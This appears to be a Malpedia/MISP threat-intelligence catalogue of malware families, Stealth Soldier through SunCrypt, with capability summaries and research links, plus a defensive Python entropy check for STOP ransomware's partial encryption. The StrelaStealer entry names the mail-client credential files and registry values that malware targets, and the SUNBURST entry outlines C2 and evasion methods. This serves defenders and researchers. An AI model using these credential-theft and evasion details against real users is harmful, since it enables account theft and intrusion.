https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/

Stealth Soldier

Check Point Research observed a wave of highly-targeted espionage attacks in Libya that utilize a new custom modular backdoor. Stealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such as file exfiltration, screen and microphone recording, keystroke logging and stealing browser information.

The tag is: misp-galaxy:malpedia="Stealth Soldier"

Stealth Soldier is also known as:

Table 4676. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stealth_soldier

https://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/

SteamHide

Malware written in .NET that hides in Steam profile pictures. It attempts to evade analysis by detecting whether it is executed inside VMware or VirtualBox.

The tag is: misp-galaxy:malpedia="SteamHide"

SteamHide is also known as:

Table 4677. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.steamhide

https://www.gdatasoftware.com/blog/2021/06/36861-malware-hides-in-steam-profile-images

https://www.gdatasoftware.com/blog/steamhide-malware-in-profile-images

StegoLoader

The tag is: misp-galaxy:malpedia="StegoLoader"

StegoLoader is also known as:

Table 4678. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader

https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer

Stinger

The tag is: misp-galaxy:malpedia="Stinger"

Stinger is also known as:

Table 4679. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger

STONEBOAT

According to Mandiant, STONEBOAT is an installer for DICELOADER. It is written in .NET and drops its payload in-memory.

The tag is: misp-galaxy:malpedia="STONEBOAT"

STONEBOAT is also known as:

Table 4680. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stoneboat

https://www.mandiant.com/resources/blog/evolution-of-fin7

STOP

STOP (Djvu) is a ransomware which encrypts user data with AES-256 and appends one of several dozen available extensions to the encrypted file’s name as a marker. It does not encrypt the entire file, only the first 5 MB. In its original version it was able to run offline and, in that case, used a hard-coded key which could be extracted to decrypt files.
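The 5 MB limit matters for triage: anything past that offset in a large file is still the original content, and a file whose head is high-entropy while its tail is not matches this partial-encryption pattern rather than a full-file encryptor. The following is an added example (not code from Malpedia or the referenced write-ups) of that head/tail entropy comparison run over constructed file contents; the entropy thresholds, the demo window size and the sample data are assumptions made for the example, and the real window is the 5 MB stated in the description.

```python
import math
import random
from collections import Counter

# The description gives the encrypted region as the first 5 MB of each file.
STOP_HEAD_BYTES = 5 * 1024 * 1024
# Assumed: small window so the demo runs instantly; use STOP_HEAD_BYTES on real files.
DEMO_HEAD = 16 * 1024


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify_head_tail(data: bytes, head_size: int = STOP_HEAD_BYTES,
                       high: float = 7.5, low: float = 6.5) -> str:
    """Compare the entropy of the first head_size bytes with the remainder.

    'head-only-encrypted' is the partial-encryption pattern described above; the
    tail is still the original content. High entropy on both sides cannot be told
    apart from a compressed format (zip, jpeg, docx) without looking at the bytes.
    """
    head, tail = data[:head_size], data[head_size:]
    if shannon_entropy(head) < high:
        return "not-encrypted"
    if not tail:
        return "encrypted-or-compressed"  # nothing past the window to compare against
    if shannon_entropy(tail) < low:
        return "head-only-encrypted"
    return "encrypted-or-compressed"


def pseudo_random_bytes(n: int, seed: int) -> bytes:
    """Deterministic stand-in for ciphertext (seeded, so the demo is reproducible)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


def constructed_sample(head_size: int = DEMO_HEAD, seed: int = 7) -> bytes:
    """Fake victim file: head_size pseudo-random bytes in place of the encrypted
    region, followed by ordinary text in place of the untouched tail."""
    tail_line = b"Quarterly report: revenue up 4%, costs flat, headcount unchanged.\r\n"
    return pseudo_random_bytes(head_size, seed) + tail_line * (head_size // 32)


if __name__ == "__main__":
    sample = constructed_sample()
    print("head entropy:", round(shannon_entropy(sample[:DEMO_HEAD]), 3))
    print("tail entropy:", round(shannon_entropy(sample[DEMO_HEAD:]), 3))
    print("verdict     :", classify_head_tail(sample, head_size=DEMO_HEAD))
```

On a real disk image the function should be fed only the bytes around the boundary (a window before and after the 5 MB mark) rather than whole files, and files shorter than the window give no tail to compare, which is why they fall into the combined label.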

The tag is: misp-galaxy:malpedia="STOP"

STOP is also known as:

  • Djvu

  • KeyPass

Table 4682. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware

https://angle.ankura.com/post/102het9/the-stop-ransomware-variant

https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore

https://www.gdatasoftware.com/blog/2022/01/malware-vaccines

https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/

https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads

https://drive.google.com/file/d/1L8mkylrCJyd-817-45RA6gIFCCX4oaOv/view

https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/

https://securelist.com/keypass-ransomware/87412/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://malienist.medium.com/defendagainst-ransomware-stop-c8cf4116645b

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/

https://intel471.com/blog/privateloader-malware

https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a

https://github.com/vithakur/detections/blob/main/STOP-ransomware-djvu/IOC-list

Stormwind

The tag is: misp-galaxy:malpedia="Stormwind"

Stormwind is also known as:

Table 4683. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stormwind

https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/

STOWAWAY

According to Mandiant, STOWAWAY is a publicly available backdoor and proxy. The project supports several types of communication, such as SSH and SOCKS5. The backdoor component supports upload and download of files, a remote shell and basic information gathering.

The tag is: misp-galaxy:malpedia="STOWAWAY"

STOWAWAY is also known as:

Table 4684. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stowaway

https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

https://github.com/ph4ntonn/Stowaway

https://blog.exatrack.com/melofee/

Stration

The tag is: misp-galaxy:malpedia="Stration"

Stration is also known as:

Table 4685. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stration

STRATOFEAR

The tag is: misp-galaxy:malpedia="STRATOFEAR"

STRATOFEAR is also known as:

Table 4686. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stratofear

https://www.mandiant.com/resources/blog/north-korea-supply-chain

StrelaStealer

According to PCRisk, StrelaStealer seeks to extract email account log-in credentials. At the time of writing, this program targets Microsoft Outlook and Mozilla Thunderbird email clients.

Following successful infiltration, StrelaStealer searches for "logins.json" (account/password) and "key4.db" (password database) within the "%APPDATA%\Thunderbird\Profiles\" directory - by doing so, it can acquire the credentials for Thunderbird.

Alternatively, if Outlook credentials are targeted - StrelaStealer seeks out the Windows Registry from where it can retrieve the program’s key and "IMAP User", "IMAP Server", as well as the "IMAP Password" values. Since the latter is kept in an encrypted form, the malicious program employs the Windows CryptUnprotectData feature to decrypt it prior to exfiltration.

The tag is: misp-galaxy:malpedia="StrelaStealer"

StrelaStealer is also known as:

Table 4687. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer

https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc

https://cert-agid.gov.it/news/analisi-tecnica-e-considerazioni-sul-malware-strela/

https://research.openanalysis.net/strelastealer/stealer/2023/05/07/streala.html

StrongPity

According to Mitre, StrongPity is an information stealing malware used by PROMETHIUM.

The tag is: misp-galaxy:malpedia="StrongPity"

StrongPity is also known as:

Table 4691. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara

https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf

https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4

https://blogs.blackberry.com/en/2021/11/zebra2104

https://mp.weixin.qq.com/s/nQVUkIwkiQTj2pLaNYHeOA

https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/

https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/

https://twitter.com/physicaldrive0/status/786293008278970368

https://blog.minerva-labs.com/a-new-strongpity-variant-hides-behind-notepad-installation

https://ti.qianxin.com/blog/articles/promethium-attack-activity-analysis-disguised-as-Winrar.exe/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/

https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html

https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg

https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity

https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/

Stuxnet

The tag is: misp-galaxy:malpedia="Stuxnet"

Stuxnet is also known as:

Table 4692. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf

https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf

https://medium.com/s2wlab/w3-may-en-story-of-the-week-code-signing-certificate-on-the-darkweb-94c7ec437001

https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security

https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper

https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf

https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf

http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html

https://web.archive.org/web/20230416140914if_/http://www.chinaview.cn/20230411/4e0fa0f4fd1d408aaddeef8be63a4757/202304114e0fa0f4fd1d408aaddeef8be63a4757_20230411161526_0531.pdf

https://media.ccc.de/v/27c3-4245-en-adventures_in_analyzing_stuxnet

https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf

https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/

https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf

https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf

https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html

SUGARDUMP

According to Mandiant, SUGARDUMP is a credential harvesting utility, capable of password collection from Chromium-based browsers. There are also versions to exfiltrate data via SMTP and HTTP.

The tag is: misp-galaxy:malpedia="SUGARDUMP"

SUGARDUMP is also known as:

Table 4696. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sugardump

https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping

SUGARRUSH

According to Mandiant, SUGARUSH is a backdoor written to establish a connection with an embedded C2 and to execute CMD commands.

The tag is: misp-galaxy:malpedia="SUGARRUSH"

SUGARRUSH is also known as:

Table 4697. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sugarrush

https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping

SUNBURST

FireEye describes SUNBURST as a trojanized, digitally-signed SolarWinds component of the Orion software framework that contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications: the Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. Multiple trojanized updates were digitally signed from March to May 2020 and posted to the SolarWinds updates website.

The tag is: misp-galaxy:malpedia="SUNBURST"

SUNBURST is also known as:

  • Solorigate

Table 4698. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst

https://twitter.com/cybercdh/status/1338885244246765569

https://twitter.com/KimZetter/status/1338305089597964290

https://www.cadosecurity.com/post/responding-to-solarigate

https://github.com/fireeye/Mandiant-Azure-AD-Investigator

https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth

https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/

https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306

https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more

https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack

https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a

https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/

https://twitter.com/0xrb/status/1339199268146442241

https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation

https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection

https://www.mimecast.com/blog/important-security-update/

https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach

https://cert.pl/posts/2023/04/kampania-szpiegowska-apt29/

https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/

https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/

https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf

https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack

https://pastebin.com/6EDgCKxd

https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/

https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html

https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha

https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html

https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/

https://www.prevasio.io/blog/sunburst-backdoor-a-deeper-look-into-the-solarwinds-supply-chain-malware

https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html

https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/

https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf

https://www.solarwinds.com/securityadvisory/faq

https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/

https://netresec.com/?b=211f30f

https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf

https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack

https://us-cert.cisa.gov/ncas/alerts/aa20-352a

https://www.youtube.com/watch?v=GfbxHy6xnbA

https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/

https://netresec.com/?b=211cd21

https://www.youtube.com/watch?v=LA-XE5Jy2kU

https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline

https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update

https://www.youtube.com/watch?v=mbGN1xqy1jY

https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities

https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance

https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/

https://netresec.com/?b=212a6ad

https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS

https://github.com/RedDrip7/SunBurst_DGA_Decode

https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

https://github.com/SentineLabs/SolarWinds_Countermeasures

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection

https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign

https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/

https://github.com/fireeye/sunburst_countermeasures

https://twitter.com/lordx64/status/1338526166051934213

https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/

https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718

https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst

https://notes.netbytesec.com/2021/01/solarwinds-attack-sunbursts-dll.html

https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug

https://us-cert.cisa.gov/remediating-apt-compromised-networks

https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html

https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://www.sans.org/webcasts/contrarian-view-solarwinds-119515

https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://twitter.com/cybercdh/status/1338975171093336067

https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

https://github.com/cisagov/CHIRP

https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling

https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en

https://netresec.com/?b=2113a6a

https://unit42.paloaltonetworks.com/atoms/solarphoenix/

https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f

https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/

https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/

https://www.brighttalk.com/webcast/7451/469525

https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds

https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks

https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf

https://us-cert.cisa.gov/ncas/alerts/aa21-077a

https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/

https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/

https://www.mandiant.com/resources/unc2452-merged-into-apt29

https://www.youtube.com/watch?v=-Vsgmw2G4Wo

https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/

https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#

https://github.com/sophos-cybersecurity/solarwinds-threathunt

https://www.youtube.com/watch?v=cMauHTV-lJg

https://twitter.com/cybercdh/status/1339241246024404994

https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html

https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/

https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html

https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/

https://us-cert.cisa.gov/ncas/alerts/aa21-008a

https://youtu.be/Ta_vatZ24Cs?t=59

https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons

https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/

https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html

https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf

https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware

https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards

https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control

https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/

https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/

https://www.youtube.com/watch?v=dV2QTLSecpc

https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/

https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc

https://www.brighttalk.com/webcast/7451/462719

https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a

https://twitter.com/FireEye/status/1339295983583244302

https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar

https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/

https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947

https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view

https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610

https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/

https://www.comae.com/posts/sunburst-memory-analysis/

https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident

https://twitter.com/Intel471Inc/status/1339233255741120513

https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/

https://www.cisa.gov/supply-chain-compromise

https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.4hou.com/posts/KzZR

https://twitter.com/ItsReallyNick/status/1338382939835478016

https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate

https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html

https://www.mimecast.com/incident-report/

https://www.fireeye.com/current-threats/sunburst-malware.html

https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware

https://www.mandiant.com/media/10916/download

https://www.solarwinds.com/securityadvisory

https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/

https://twitter.com/megabeets_/status/1339308801112027138

https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution

https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q

https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection

https://www.youtube.com/watch?v=JoMwrkijTZ8

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data

https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/

https://community.riskiq.com/article/9a515637

https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/

https://r136a1.info/2022/06/18/using-dotnetfile-to-get-a-sunburst-timeline-for-intelligence-gathering/

https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/

https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs

https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software

https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/

https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html

https://securelist.com/sunburst-backdoor-kazuar/99981/

https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf

https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/

https://www.prevasio.io/blog/sunburst-backdoor-part-ii-dga-the-list-of-victims

https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action

https://youtu.be/SW8kVkwDOrc?t=24706

https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095

SunCrypt

According to PCrisk, Suncrypt ransomware prevents victims from accessing files by encryption. It also renames all encrypted files and creates a ransom message. It renames encrypted files by appending a string of random characters as the new extension.

The tag is: misp-galaxy:malpedia="SunCrypt"

SunCrypt is also known as:

Table 4699. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://blog.minerva-labs.com/suncrypt-ransomware-gains-new-abilities-in-2022

https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/

https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/

https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc

https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-is-still-alive-and-kicking-in-2022/

https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer

https://cdn.pathfactory.com/assets/10555/contents/394789/0dd521f8-aa64-4517-834e-bc852e9ab95d.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

